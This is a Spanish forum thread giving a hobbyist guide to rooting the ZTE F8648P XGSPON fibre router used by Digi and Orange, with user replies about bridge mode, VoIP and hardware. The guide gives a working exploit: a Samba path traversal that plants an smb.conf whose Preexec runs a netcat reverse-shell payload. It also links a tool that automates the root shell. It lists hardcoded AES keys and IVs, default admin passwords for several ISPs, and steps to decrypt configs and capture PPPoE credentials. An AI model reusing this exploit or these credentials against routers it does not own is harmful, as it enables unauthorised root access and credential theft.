BandaAncha

  • 🔍 en 📰 artículos ⏎
  • 🔍 en 💬 foros ⏎
  • 🔍 en 👇 este 💬 foro ⏎
  • 🔍 en 👇 este 💬 tema ⏎
Regístrate Regístrate Identifícate Identifícate
Fibra
💡

Todo sobre el router Zte F8648P XGSPON: admin, decodificar archivos, SNMP…

alezz
25
Router Digi XGSPON ZTE ZXHN F8648P

Recopilación de info sobre el router Zte ZXHN F8648P utilizado por Digi y Orange para las conexiones de fibra XGSPON de 10 Gb.

Todo la guia se ha hecho en base a la siguientes versiones de hw/sw del F8648P:

  • Versión de hardware V2.0
  • Versión de software V2.0.12P7N3
  • Versión de boot V2.0.12P10N2

Usuarios han confirmado que sigue funcionando en las versiones:

  • V. Software: V2.0.12P7N9 con V. Boot: V2.0.12P10N3

Si vas a reportar un problema asegúrate de comprobar que tienes estas mismas versiones.

Las versiones posteriores de firmware para este router tiene parcheado el samba y no permiten hacer hacer lo que se indica en esta guía, al menos por el momento.

Obtener shell de root y config descifrada de forma "casi" automática

demo

Despues de darle algunas vueltas he conseguido hacer que no sea necesario usar un USB, simplificando mucho el proceso y eliminando posibles problemas.

Para ello he creado un programilla que podemos ejecutar desde Linux y siendo root (ya que necesita montar la partición SMB). Como prerequisito tiene que estar instalado el paquete cifs-utils (apt install cifs-utils si se está usando debian o derivados).

Descargamos la utilidad Supertool de mi repo:

Entramos a la carpeta supertool e instalamos las dependencias:

cd ztef8648p/supertool

python3 -m pip install -r requirements.txt

* Si nos diera un error diciendo que pip no está instalado podemos instalarlo con el comando apt install python3-pip.

Y lo ejecutamos y seguimos las instrucciones, que se han reducido al máximo, de hecho solo pide la password de user y la IP del router en caso de que no lo encuentre automáticamente:

python3 zte-supertool.py --nousb

Igualmente si se prefiere seguir usando el USB es posible hacerlo. Tendremos que añadir a un USB formateado en NTFS como mínimo el binario nc y el enlace simbólico raiz (ln -s / raiz). Cuando ejecutemos el programa hay que hacerlo sin la opción --nousb.

El programa tiene dos modos de funcionamiento:

  • 1. Obtener shell de root

Este modo nos pedirá contraseña de user y abrirá una shell de root en el router con la que podremos realizar cualquiera de los procedimientos de esta guia que requieran acceso de root como por ejemplo cambiar la password de admin o cambiar la región del router para activar el modo bridge.

  • 2. Obtener config descifrada

Este modo requiere conocer la pass de admin del router. Averigua automáticamente la key de descifrado de la config, descarga la config y la descifra, dejando el archivo en texto plano en config.bin.txt

Para que esta opción funcione con la nueva versión de firmware hay que cambiar la región al router a la 173, ya que han eliminado la posibilidad de descargar la config con el usuario cuando está funcionando con la región 2009, que es la que viene por defecto con Digi.

Obtener shell de root manualmente

Prerrequisitos: Máquina virtual con Linux con el interfaz de red en modo bridge, USB formateado en NTFS, compatibilidad SMB1.0/CIFS activada en Windows. Probado en firmware V2.0.12P7N3.

  • Montamos el USB en Linux y creamos un enlace simbólico dentro del mismo:
ln -s / raiz
  • Descargamos BusyBox y lo metemos en en el USB:
wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv7l -O busybox
ln -s busybox nc
  • Creamos un fichero llamado payload.sh en el USB con este contenido, siendo *IP* la dirección IP de red local de nuestra máquina virtual Linux:
rm -f /tmp/f ; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | /mnt/usb1_1_1/nc *IP* 3339 > /tmp/f
  • Creamos un fichero llamado test.smb.conf con este contenido:
[global]
guest account = root
deadtime = 5
log level = 0
max smbd processes = 3
server string = Samba Server
security = user
encrypt passwords = yes
smb passwd file = /var/samba/var/smbpasswd
load printers = no
workgroup = workgroup
netbios name = samba
short preserve case = yes
preserve case = yes
interfaces = 192.168.1.1/24
server signing = True
[pwn]
Preexec = /mnt/usb1_1_1/payload.sh
comment = samba share dir
read only = no
public = yes
writable = yes
max connections = 3
path = /
  • Desmontamos el USB y lo pinchamos en el router
  • Nos vamos a la web del router y activamos Samba poniendo como user test y password test
  • Desde Windows entramos a \\192.168.1.1\samba y nos autenticamos como user test y password test
  • Entramos dentro de la carpeta usb1_1_1, pinchamos en el fichero test.smb.conf y hacemos Ctrl+C para copiarlo
  • Escribimos en la barra del explorador \\192.168.1.1\samba\usb1_1_1\raiz\var\samba\lib, intro y pegamos con Ctrl+V el fichero test.smb.conf
  • Vamos ahora a Linux y ejecutamos nc -l -p 3339, se quedará a la espera de una conexión entrante
  • Volvemos a Windows y vamos a \\192.168.1.1\ , se deberían ver 2 carpetas compartidas: samba y pwn
  • Entramos en pwn, Windows se quedará cargando sin entrar a la ruta. Si entrase es que hemos hecho algo mal al copiar el BusyBox o hemos puesto mal la IP local en el payload.sh
  • Si como es esperable se queda cargando, ya que está ejecutando internamente el preexec, vamos al Linux y deberíamos ver que en la ventana del comando nc se nos ha abierto una shell de root. En este punto hemos obtenido acceso como root en el router.

Cambiar clave de admin

Una vez tenemos shell de root podemos ejecutar:

sendcmd 1 DB p DevAuthInfo
sendcmd 1 DB set DevAuthInfo 0 Pass admin
sendcmd 1 DB save

Con esto ganamos acceso con el user admin y pass admin via web.

Volcado de memoria

No se puede volcar toda la memoria del sistema usando /dev/mem, pero mediante gdb podemos volcar la memoria de un proceso concreto.

Usaremos gdb que podemos descargar de esta url:

wget https://github.com/marcinguy/arm-gdb-static/raw/master/gdbstatic -O gdb

Ejemplo para volcar a ficheros la memoria del proceso cspd, con pid 165:

grep rw-p /proc/165/maps | sed -n 's/^([0-9a-f]*)-([0-9a-f]*) .*$/1 2/p' > /mnt/usb1_1_1/direcciones.txt

Ahora en el PC guardamos el fichero y generamos una lista de comandos a ejecutar que podemos pegar en la consola para que se ejecuten de golpe:

cat direcciones.txt | while read start stop; do echo "/mnt/usb1_1_1/gdb -–batch -–pid 165 -ex \"dump memory 165-$start-$stop.dump 0x$start 0x$stop\""; done

Sacar usuario y clave PPPoE

Podemos extraer los datos PPPoE usando el tcpdump que incluye el propio router. Tras ejecutar el comando quitamos y ponemos el cable de fibra para que vuelva a negociar la sesión. Nos devolverá los datos en texto plano:

tcpdump -i any -A pppoes

Sacar password de ssh, telnet y samba

Se pueden obtener haciendo un volcado de la memoria del kernel (cat /proc/kmem > /mnt/usb1_1_1/memoria.bin) y manteniéndolo en ejecución durante unos minutos.

Salen en plano, y realmente en concreto los del SSH que incluye este router no sirven para nada ya que está muy limitado y no tiene una shell real sino que tenemos que invocar los pocos comandos que permite con shell <comando>

La clave es el serial completo y en mayúsculas del router: admin:ZTEGCDD12345

Los comandos que se pueden ejecutar están definidos en unas listas que son legibles con la aplicación routerpassview, y están en /etc/authorize

Abrir telnet

El telnet se puede abrir mediante los siguientes comandos:

sendcmd 1 DB set TelnetCfg 0 TS_Enable 1
sendcmd 1 DB set TelnetCfg 0 Lan_EnableAfterOlt 0
sendcmd 1 DB set TelnetCfg 0 TS_UName <usuario>
sendcmd 1 DB set TelnetCfg 0 TS_UPwd <password>
sendcmd 1 DB save

Hecho esto hacemos un pkill zxtds para que se reinicie el servidor telnet con los parámetros actualizados

Ficheros config.bin

La clave se calcula en el ejecutable cspd, funcion PdtDBSetUserCfgAESCBCEncryKey()

Es parte del número de serie del XGSPON y la mac principal con los octetos al revés. La función Pdt… saca el numero de serie de leer el /tagparam/paramtag, segundo campo.

Por ejemplo si tenemos un número de serie del XGSPON que sea ZTEGCDD123456 y una MAC que sea 50:5d:de:ad:be:ef nuestra key será: CDD123456efbeadde5d50.

El iv es genérico, y en este caso es similar al de otros routers, y es Zte%FN$GponNJ025. La función lo saca leyendo del fichero cifrado /etc/hardcodefile/dataprotocol, campo DefAESCBCIV.

  • El número de serie se puede consultar en la etiqueta del router o en la web, aunque en la web aparece en minúsculas.
  • La MAC se puede consultar en la etiqueta del router o desde la shell de root haciendo un ifconfig br0.

Para descifrarlo, desde Linux, podemos descargar y ejecutar los siguientes programas:

git clone https://github.com/mkst/zte-config-utility.git
cd zte-config-utility
python3 setup.py install --user
wget https://pastebin.com/raw/CCqm1tfj -O configdec.py
python configdec.py --key-prefix CDD123456efbeadde5d50 --iv-prefix 'ZTE%FN$GponNJ025' config.bin config.bin.txt

Fichero /tagparam/paramtag

La key e iv para descifrar este fichero se calculan desde el fichero libtagparamuserapi.so, función _tagparamDecry(). Tanto la key como el iv salen de la misma cadena.

Se calcula obteniendo el valor %s%s%s para el que cada uno de los parámetros es:

  • zx279132
  • Resultado de la función GetValueFromProcFile.constprop.0(), que es el campo vid del /proc/capabilities/boardtype → 33
  • 8cc72b05705d5c46f412af8cbed55aad

Por tanto la clave que buscamos es:

  • plain-key = 'zx279132338cc72b05705d5c46f412af8cbed55aad'
  • plain-iv = 'zx279132338cc72b05705d5c46f412af8cbed55aad'

Este valor ahora tenemos que recortarlo a 32 caracteres y calcularemos su sha256.

Del resultado del sha256 los primeros 32 caracteres son la key, y los primeros 16 caracteres son el iv.

Una vez que tenemos esto simplemente hay que descifrar cada una de las secciones del paramtag usando aes_cbc.

De este fichero podemos sacar información que realmente no nos será muy útil si ya tenemos el config.bin, ya que mayormente los tags que tiene son:

  • ZTEG
  • Parte del serial del XGSPon que se usa para la key del config.bin
  • MACs de cada uno de los interfaces
  • Serial GPON + primera mac, todo en mayúsculas (esto podría ser una clave para algo que falte por descubrir)
  • 6 primeros carácteres de la mac principal
  • Serial del router
  • Nombre de la wifi 2.4
  • Pass de la wifi 2.4
  • Nombre de la wifi 5.0
  • Pass de la wifi 5.0
  • Pass de admin
  • 4
  • Versión del router tal como aparece en la web
  • 0
  • 0

Ficheros /etc/db_default_*.xml

Estos ficheros tienen configuraciones por operador. Están comprimidos con zlib deflate y cifrados con aes cbc y la key e iv son los genéricos del router, que se obtienen bien extrayendolos de /etc/hardcodefile/dataprotocol o bien leyendo la memoria del cspd. La función que hace el set de las claves es CSPDBInitPdtInterface() y obtiene de dataprotocol los tags DefAESCBCKey (f2801sv2) y DefAESCBCIV (Zte%FN$GponNJ025).

  • plain-key = 'f2801sv2'
  • plain-iv = 'Zte%FN$GponNJ025'

Cosas interesantes de los ficheros:

  • En db_default_cfg.xml hay unas claves genéricas que parece que se sobreescriben, aunque siempre es bueno mencionarlas por si acaso:
    • Pass del usuario id 0 (admin) : Web@0063
    • Pass del usuario id 1 (user) : Web@0763
  • En db_default_SpainDigiHgu_cfg.xml no hay nada realmente destacable, se define el IMS para la VoIP y la clave user para el usuario user.
  • En db_default_MasMovil_cfg.xml se definen las password que supongo son las que usan en Orange:
    • Pass del usuario id 0 (admin): admin
    • Pass del usuario id 1 (1234): 1234
  • En db_default_ItalyTi_cfg.xml se configuran mismas pass de admin que están en el db_default_cfg.xml
    • Pass del usuario id 0 (admin) : Web@0063
    • Pass del usuario id 1 (user) : Web@0763
  • En db_default_Malaysia_cfg.xml se configura su ACS y poco más
  • En db_default_Viettel_cfg.xml se configura su ACS, redes wifi y se deshabilita el user id 1 (user)
  • En db_default_Manufacture_cfg.xml se definen passwords:
    • Pass del usuario id 0 (admin): admin
    • Pass del usuario id 1 (user): username

Ficheros /etc/hardcode y /etc/hardcodefile/*

Estos ficheros contienen configuraciones por defecto. Están cifrados con CBC y la Key e Iv se calculan de la cadena de texto plano que hay en /etc/hardcode.

Cadena de texto (contenido de /etc/hardcode):

09a01cee5518b341f40d83f1cc5e7c2ac3631ee2fd87c3b85b6b586194cc5486f8648pv2.0_2Gflash
  • plain-key = 'fhh884;e674i73g;f8648pv2.0_2Gflash'
  • plain-iv = 'f8648pv2.0_2Gflash'

De las passwords hay que crear un sha256 y recortarlo a 32 caracteres.

La peculiaridad de estos ficheros es que el primer bloque de cifrado, los primeros 16 bytes, llevan una encriptación básica de sustitución con variación según la posición. Gracias a ello se pueden adivinar los valores sin meterse a sacar el algoritmo exacto.

  • dataprotocol

83d299672bad91c26bedc31101beca4f

D e f A E S C B C K e y = f 2 8

01sv2\nDefAESCBCIV=Zte%FN$GponNJ025\nAESENCRYKey=\nuserkey=608158c36497b00221db14afb845c9e3

  • wlan

90d28f6d0b87e3bd199797590dd2af12

W e p K e y 1 = 1 1 1 1 1 \n W e

pKey2=22222\nWepKey3=33333\nWepKey4=44444\nKeyPassphrase=!@#$%12345\nWapiKey=!@#$%12345\n

  • tr069

8ad08b750b8ca4e55a8896466cb98b04

M g t S e r v e r . 0 . P a s s

word=hgw\nMgtServer.0.ConnectionRequestPassword=TR069_v2\nMgtServer.0.PKCS12PassWord=8cc72b05705d5c46f412af8cbed55aad\nConnReqPwd_Telmex=!@#$%12345

  • webpri

90d29d6e3aaa82d363c3df5546ac9d46

W e b * * * * * * * * = z t e 1

2345!@#$%nWebPrivateKey=Web2019!#%&\nWebRepKey=nE%jA@5b\nDefAdNewPass=Web@0063\nDefUsNewPass=Web@0763\nDefSecNewPass=Web@0863\nDefAdNewPass100=admin\nDefAdOldPass100=Web@0063\nDefAdNewPass14=TURE@cmpAWes\nDefAdNewPass118=bi*wq51vW8el8cu@\n

Modo Bridge

La opción no está disponible inicialmente, pero hay más de una forma de conseguirlo.

Además de realizar alguno de los siguientes métodos hay que tener en consideración que se debe desactivar el servidor DHCP del router, así como asignar o no la VLAN (20) bien al Zte o bien al router neutro.

Asimismo en las opciones de Port Binding de la web del router asignaremos un puerto a la conexión bridge, que será donde conectaremos el router.

Si hemos activado el modo bridge perderemos el acceso al F8648P desde el router neutro, ya que la red en la que funciona el bridge quedará innacesible por el interfaz de red en el que está conectado el router neutro. Para acceder al F8648P conectaremos ya sea via wifi o conectando el cable de red de nuestro PC a otro de los puertos del F8648P que no esté asignado al bridge.

Método 1

Desde la consola ejecutamos los siguientes comandos:

cd /home/httpd/thinklua/template
mkdir /mnt/usb1_1_1/template
cp -r * /mnt/usb1_1_1/template
cd ..
mount /mnt/usb1_1_1/template /home/httpd/thinklua/template
cd template
cp config_173.lua config_2009.lua
ps | grep http
kill -9 pid <proceso httpd>

Automáticamente levantará de nuevo el httpd con la configuración que hemos introducido y ahora en WAN se pueden crear conexiones no solo con Routing sino con Bridge.

Habría que asignar en Port Binding un interfaz a esta nueva WAN.

El cambio en la web es temporal y se pierde al reiniciar o sacar el USB.

Método 2

Consultar la siguiente sección Region Code para habilitar las opciones que se presentan en el método 1 pero de forma permanente.

Método 3

Encontrado por el user @Geokaoz. Usar las herramientas de desarrollador de chrome/firefox y cambiar "Routing" por "Bridge" antes de hacer una modificación en la WAN internet.

Asignar el puerto que queramos de WAN en la opción Port Binding.

Region code (operador)

El router decide qué perfil de operador aplicar en base al contenido del fichero /userconfig/flag_type. En el caso de Digi el código es 2009. La lista de códigos está en /etc/init.d/regioncode. El código de Zte de producción es 173.

Si hacemos un:

echo "current : 173" > /userconfig/flag_type

* Al editar esta línea hay que tener especial atención con el espacio que hay entre current y : . Si no lo ponemos lo que ocurrira es que se invalidará el fichero y se configurará sin región, lo cual es algo que no está contemplado en la guia.

Y matamos los procesos zxtds (serv. telnet) y httpd (serv. web) o reiniciamos el router, a partir de este momento el telnet admitirá cualquier comando (la shell se arrancará con sh -lproduction en vez de -luser) y la web cambiará el logo de Digi por el de Zte y aparecerá la opción de bridge tal y como salía en el método 1 del Modo Bridge.

Este cambio es persistente a reboots y reversible. Para volver a la región original repetir los pasos pero en vez de poner la región 173 pondremos la 2009.

Mientras tengamos el router en la región 173 no recomiendo hacer reinicios de fábrica del dispositivo sino usar backups de configuración que tengamos guardados. Aún así, si se tiene que hacer forzosamente un reinicio de fábrica la password de admin que se va a poner tras el reinicio es admin. Si se edito incorrectamente el fichero y no se respetó el espacio como indico anteriormente la password de admin será Web@0063.

Si se reinicia de fábrica con otra región que no sea la 2009 no se descargará los datos del TR-069 y por tanto no conectará con internet.

Si se ha omitido lo comentado anteriormente y se ha reiniciado de fábrica con una región diferente a la 2009 hay dos posibilidades de recuperar la conexión:

  • Acceder a la consola y cambiar el fichero flag_type dejandolo otra vez como 2009.
  • Restaurar un backup de configuración que tenga los parámetros PPPoE y demás, necesarios para conectar a la red.

Deshabilitar TR069

Desde la consola podemos ejecutar:

sendcmd 1 DB delr MgtServer 0
sendcmd 1 DB save

Esto elimina todos los valores del TR069 pero no hace que se deje de crear el interfaz OMCI para la VoIP.

SNMP y NPU

Este router utiliza un NPU (Network Processing Unit) para acelerar conexiones. Esto genera un problema al utilizar programas de terceros que requieran recursos estándar de Linux. Por ejemplo tanto ifconfig como snmpd utilizan /proc/net/dev para obtener la información que van a mostrar, y por desgracia por culpa del NPU esta no es precisa.

El NPU se puede deshabilitar a través de /proc/Zte/ffe/cmd (echo npu 0 > cmd), pero genera una penalización en el ancho de banda, que se limitaría a aproximadamente 1.6Gbps, por tanto no tiene sentido deshabilitarlo.

Todo esto lo descubrí tras compilar el mini-snmpd para arm64 y comprobar que los datos que obtenía eran erróneos y la sensación que daba es que solo me mostraba un spike inicial de las conexiones. Visto esto también me di cuenta de que por ejemplo al hacer un speedtest-cli, el ifconfig solo reportaba un incremento de unos 200MB cuando la realidad es que lo mismo se habían transmitido ~2GB.

Entonces vi que a través de la web del router en la página de LAN status sí que daba datos correctos, y me puse a investigar para averiguar cómo era posible.

Después de una investigación que ha implicado hacer reversing a los binarios cspd, httpd, sendcmd y sus bibliotecas, he llegado a la conclusión de que se pueden obtener datos reales de bytes y paquetes transferidos a través de /dev/switch_mgr, pero no es trivial obtenerlos ya que hay que usar ioctl() y además ghidra no muestra exactamente cómo se recogen los datos, es decir, sé cómo pedir los datos pero no como recogerlos.

Sin embargo hay una manera alternativa, ya que es posible obtener datos de estadísticas de tráfico a través de la consola con el comando:

sendcmd 1 switch_mgr getPortStats <interfaz>

Este comando hace internamente lo que he comentado anteriormente de usar ioctl() con /dev/switch_mgr, y después envía a stdout los datos obtenidos.

Sabiendo esto, y a falta de averiguar cómo utilizar /dev/switch_dev de forma nativa, lo que he hecho ha sido parchear el servidor snmpd que estoy usando, mini-snmpd, para que cree un fichero fake del /proc/dev/net pero con los datos agregados de llamar al comando anterior y obtenga los datos del él.

* Nota: El primer mini-snmpd que subí al repositorio no liberaba algunos punteros e iba consumiendo muy lentamente la memoria del router hasta que se reiniciaba. Está arreglado en una nueva versión que he subido.

./mini-snmpd -i eth0,eth1,eth2,eth3,eth4,wlan0,wlan4

Si alguien se anima a montar esto le recomiendo que lo haga con grafana/influxdb/telegraf, hay tutoriales en internet que explican como hacerlo muy facilmente. El resultado final es como se ve en la imagen.

grafana1.webp

Utilizar otro proveedor de VoIP

Descubierto por el usuario @miquel1. Probado con una cuenta de Netelip.

Apuntamos los datos de la conexión WAN PPPoE. Eliminamos dicha conexión y creamos una nueva conexión con los mismos datos pero indicando que la conexión es para Internet y VoIP.

En el apartado de VoIP hay que indicar en Interfaz de Red, que use la nueva WAN creada, en vez la que lleva por defecto , ya que sólo sirve para el SIP de Digi.

Introducimos nuestros datos de conexión y en VoIP/Basic, utilizando las herramientas de desarrollador del navegador vamos a buscar un div llamado "div_Enable:0", que tendrá la propiedad "display:none" y la vamos a eliminar. De esta manera veremos temporalmente una nueva opción, Enable, que tendremos que poner en On.

Algunas cosas ocultas que trae el router

Hay algunas opciones que el router tiene pero que por algún motivo no han decidido incluir en la configuración y solo están disponibles para algunas regiones. Hasta ahora las que he visto son:

  • Opciones EasyMesh: Existen dentro de la web pero realmente no funcionan bien y activarlas no tiene ningún efecto en la configuración. Son tres opciones. 1) on/off 2) RSSI threshold 2.4g 3) RSSI threshold 5.0g.

Se supone que este router tiene certificación para funcionar como controlador de una red EasyMesh. Estaría bien que alguien que tenga esto montado nos diga si efectivamente funciona.

  • Opciones EEE: Activa/Desactiva el EEE que es una especificación del 802.11 para el ahorro de energía. En teoría tenerlo activo significa que apagará electrónicamente los puertos que no se estén usando.
  • Opciones QoS: Toda una serie de opciones para QoS. No se que sentido tiene usarlo en una red 10Gbps, pero bueno, ahí están.
  • Opciones Conntrack: Pequeña página donde pone el límite máximo de conexiones abiertas que puede tener el router y el valor actual del número de conexiones abiertas.
  • Opciones de monitorización CPU/Mem: Muy básico, indica el porcentaje de uso de cada una de las cuatro CPU's del router y el porcentaje del uso de memoria del mismo.

Recopilación de programas, scripts y ficheros de configuración

Aquí está todo lo necesario para replicar lo que se menciona en este post: Repositorio de utilidades

esteveli

Muy interesante el articulo, enhorabuena! voy a probar a aplicarlo al H298Q y a contratar la vozip con Digi, a lo poco con el admin lo puedo configurar sin PPPoE y dejarlo como ATA

🗨️ 4
alezz

Con el H298A estuve probando con otro usuario y no funciona esta forma de conseguir shell, ya nos contarás si funcionó en el tuyo.

🗨️ 3
esteveli
2

Despues de probarlo, no funciona esta parcheado, pensandolo bien este fallo es un error recurrente en los Zte, ya en el pasado el fallo del samba ha sido explotado en otros modelos

🗨️ 1
alezz
1

Sí, de hecho en este modelo si pones el enlace directamente a /var/samba/lib/smb.conf que es lo que pone en tutoriales de routers anteriores no funciona, lo cual me da más o menos la idea de que sobre este firmware ,que la base es heredada de otro router, se hizo algún tipo de arreglo del fallo pero por algún motivo no se hizo completo y permite atravesar directorios (ya que si se accede directamente a /samba/raiz da error).

Millernv

Hola, me sale Waiting for connections on :::3339

ip6 desactivado no se que hacer. pago para resolver esto por any desk. gracias

Geokaoz
1

Hay que tener en cuenta para no tener problemas con el bridge hay que deshabilitar el VLAN y el DHCP de la ONT y dejar que el router neutro se encargue de eso… de lo contrario la ONT estará intentando asignar ips de los dispositivos conectados al router neutro, me ha pasado que me quedo sin internet… y era por eso

farlon20100

Hola, si al hacer la primera parte del tutorial vuelvo a la raiz y no veo la carpeta pwm a que puede deberse el error?

Miquel 1

Hola, con mi router Zte F8648P de Digi, cuando pongo el USB en NTFS no puedo acceder a él por samba, sólo si lo formateo en FAT32 me da acceso al contenido del USB, pero claro en FAT32 no se pueden crear enlaces simbólicos, con lo que no se puede hacer el hack para que vaya a la raiz

Puede ser que mi router esté parcheado ? o hace falta algo para que el router admita un USB en NTFS ?

Se podría solucionar haciendo un downgrade del firmware ? (no tengo un firmware anterior de este router de Digi) alguien lo tiene para así instalarlo ?

🗨️ 8
vukits

¿En vez de FAT32 has probado ext3fs y ext4fs ?

🗨️ 2
Miquel 1

Hola, lo acabo de probar, y tampoco

Solo en FAT32 puedo acceder al contenido …

La versión es

Versión de software V2.0.12P7N3

Versión boot V2.0.12P10N2

Pero desde el user/user no hay opción a cambiar el firmware …

🗨️ 1
vukits

Solo en FAT32 puedo acceder al contenido …

pues lo llevas crudo ;)

alezz

La versión de firmware que tienes es la misma con la que hice la guia.

El USB que he estado usando yo es uno normalito de 8GB con NTFS 3.1, puedes ver la version de NTFS desde Linux con el comando ntfsinfo -m /dev/sdc1 (en mi caso el USB lo detecta como /dev/sdc, esto puede variar segun el número de unidades que haya en el sistema). Desde Windows puedes mirar también la version de NTFS con el comando fsutil.

🗨️ 4
Miquel 1

He conseguido acceder con un USB pero de 8 Gb (NTFS) con varios de 32 Gb que tengo no entiendo porqué pero no funcionaba.

Ahora necesito activar el VoIP del router, he añadido una nueva conexión WAN, (VoIP) ya que en el router solo tengo 2, la de la Internet y la omci_ipv4_static_2

La he configurado con Tipo Ruteo, y Servicio (sólo VoIP) con IPv4 DHCP y VLAN apagado (he probado también con 20 pero no hace nada)

El problema es que no conecta esta nueva conexión , en Estado de conexion IPv4 , está en "conectando" y no se le asigna ninguna IP a la conexión de VoIP

Habría que configurarlo como Static ? pero no se las IP. (Nota : No tengo fijo con Digi, sólo la fibra , y intento usar la linea SIP de netelip)

🗨️ 3
alezz

En teoría la OMCI es para VoIP, pero claro, para conectar a los servidores de Digi. Mira a ver si en las opciones SIP puedes decirle que tire de la conexion WAN normal y metele los servers de tu proveedor, ya que no creo que vayan los tiros creando otra conexion WAN, que dará conflicto con la ya existente.

Que sería en SIP/Network Interface, cambiar OMCI por Any. Si lo del Any no va, podrías eliminar la conexion WAN de internet previo guardado de la config y crearla otra vez añadiendo que tiene VoIP en vez de solo internet.

🗨️ 2
Miquel 1
Miquel 1
🗨️ 1
alezz
alezz
SinCracK

Sabeis si Digi da la posibilidad de instalar este router? Tengo un Synology con una nic dual de 10gb y pfsense, me gustaria poder ponerlo en bridge pero no se si me van a dar la opcion de pedir este router en concreto, ayer llame y me tiene que llamar el tecnico para venir, si me viene con otro router le dire que no quiero pasar de 1gb a 10gb y me quedo como estoy… Este es el unico router que permite bridge a dia de hoy no?

Saludos!

🗨️ 7
SinCracK

No entiendo porque me pones el FAQ, ya lo lei, pero no responde mi pregunta, o no lo encuentro, se que este router se puede poner en bridge y el zyxel se pudo pero ya no, entonces mi pregunta es si se puede pedir a Digi este o solo ponen el zyxel, porque he leido que a alguien se lo querian cambiar este por el zyxel por problemas en wifi y lo mismo ya no instalan este, no hay mucha info de que estan montando ahora mismo o no me entero de lo que leo jejej

🗨️ 5
vukits

procuro mantener el F.A.Q de Digi actualizado (es un artículo colectivo, realmente).

Como verás, ahí aparecen dos routers 10G, el Zyxel y el Zte … (etiqueta '(10G) ')

Y el Zyxel, malamente se puede obtener la contraseña admin (no queda muy claro).

yo creo que tú mismo puedes sumar dos y dos ;)

básicamente, la única posibilidad que tienes es que te instalen el Zte .

🗨️ 4
SinCracK
SinCracK
🗨️ 3
vukits
vukits
🗨️ 2
SinCracK
SinCracK
🗨️ 1
SinCracK
SinCracK
1
EmuAGR
5

¡No es "Todo sobre el Zte F8648P" si no hay una foto de las tripas!

image.webp

Es bastante difícil de abrir, tiene un tornillo donde la tapa de la fibra y otro bajo la etiqueta, donde el segundo código de barras del XGS-PON SN. Hace falta mucha maña con las solapas de plástico, abriendo desde el puerto de fibra hasta las dos esquinas superiores.

Eso negro es un disipador, el consumo es 12V 3A, así que hasta 36W. El IC que da los 10GbE parece un RTL8261: e2e.ti.com/cfs-file/__key/communityserve…4_2D00_b.pdf

He encontrado la variante RTL8261N: realtek.com/en/press-room/news-releases/…-at-2022-ces

🗨️ 5
Jav9i

Ya que lo has abierto, me imagino que esto tambien lo habaras mirado, se calienta mucho el bicho?

Los LEDs alumbran mucho? Se pueden apagar?

Gracias!

🗨️ 2
EmuAGR

Se calienta similar a otros que he tenido como el Livebox Fibra/+. La verdad es que disipa bien el calor con esas placas puestas.

Los led son verdes y no son intensos, color como los displays de 8 segmentos de un despertador led, me parecen más suaves que los del F680. No he visto opción de apagarlos.

🗨️ 1
Jav9i
1

Gracias, ahora te toca disfrutar de lo que tanto te ha tocado esperar :)

EmuAGR

No he podido investigarlo en esa profundidad. Seguramente tenga puerto para poder darle servicio, pero hace muchos años que Zte tiene bloqueados los bootloaders con credenciales desconocidas (el último que recuerdo que funcionaba, el F680v2).

EmuAGR

Me gustaría comentar sobre los pasos que he ido siguiendo:

  • Es posible que sea necesario instalar el cliente SMB 1.0 en Windows 10 porque antes de eso no podía acceder de ninguna manera.
  • Sobre el usuario y contraseña PPPoE de ProDigi, es la misma que Smart. Es decir, si pedís que os manden la config cuando tenéis 1 Gbps, ¡cuando evolucionéis tendréis la misma! (Pero una vez evolucionado no os la darán). La acabo de sacar y es la misma que tenía en el correo del 12/11/21. Desconozco si sería el mismo caso en el Zyxel.
🗨️ 5
alezz

Está puesto en la primera línea de la sección de obtener root, junto con otros requisitos.

🗨️ 4
EmuAGR

Correcto alezz, lo que pasa es que empecé el tutorial en Linux pero no me funcionó, y luego pasé a Windows y omití ese detalle. Gracias por indicármelo.

Voy a ir actualizando el post de arriba, he añadido un descubrimiento sobre las credenciales PPPoE de XGS-PON. Ahora lo que me gustaría es encontrar un módulo SFP+ XGS-PON para sustituir el router entero por un transceptor en el puerto de mi NAS.

🗨️ 3
alezz

En Linux se puede montar el CIFS pero yo al menos no he conseguido que sea estable. Hay que meterle en el mount una opción para que utilice la version 1 de CIFS y para que funcione el path traversal hay que ponerle también la opción noposix. Esta última opción no está en todas las distros. En debian está, en ubuntu no, por ejemplo. No se si por ser una opción nueva o por estar obsoleta. La cosa es que incluso haciéndolo funcionar de primeras cuando quiere se desconecta. En windows por lo que sea pasa menos, de hecho si se hace bien a la primera no falla. Aunque también se encasquilla a veces, sobre todo si nos equivocamos al poner la password hay que andar reiniciando el servicio en el router y haciendo net use /k etc.

Lo de las credenciales ya me lo comentó otro usuario y sí, a él le paso igual, las contraseñas que sacamos del fichero de config eran las mismas que tenía con su router anterior. No se hasta que punto puede ser relevante para este router en concreto ya que supongo que es más bien algo relacionado con como Digi provisiona que con el router.

Y lo del SFP+ yo creo que por ahora nada. Cuando alguna empresa como RS empiece a comercializar transceptores como los que ya tiene en versión SFP que permitan cambiar el SN y funcionen en la misma longitud de onda que los de los routers que pone Digi se verá un poco de luz en este tema. Sin contar que veo más posible que ocurra antes que alguien consiga hacer andar el SFP+ del zyxel en un router neutro. De hecho a mi me gustaría ayudar con este tema pero por suerte o desgracia me ha tocado el Zte.

🗨️ 2
EmuAGR
EmuAGR
🗨️ 1
alezz
alezz
ROM64

Muy buenas. Una pregunta inocente. Me han instalado ya los 10GB y todo va como la seda.

Si pongo la antigua ONT al cable de fibra junto al anterior router neutro que tenía con las claves PPPoE ya sacadas. Debería funcionar?

Gracias.

🗨️ 1
Roxtin9

No, no se si cambian las claves PPPoE al pasar a 10G pero lo que si cambia es el SN de la ONT, por lo que la antígua no sincronizará.

ROM64

Si. Es verdad, no sincroniza, PON se queda parpadeando en verde.

De todas formas me voy a quedar con las claves PPPoE por si acaso baja de precio una Huawei que he visto pero que es carísima. Algo más de 100€

Toca esperar a que bajen los precios.

Gracias

🗨️ 13
EmuAGR

Si pones el router en modo bridge, debería sincronizarte con esas claves PPPoE.

🗨️ 12
ROM64

Pues tengo la ONT con el SN de la antigua, que tiene 16 caracteres "485754436BD3F1A3", por supuesto no sincroniza ya que era el SN anterior y no sé como "trasplantar" el SN nuevo del Zte de 10GB a la ONT.

Ahora está en formato "ZTEG+4 pares de caracteres hexadecimales". ¿Como paso eso a un SN de 16 caracteres?

🗨️ 11
EmuAGR

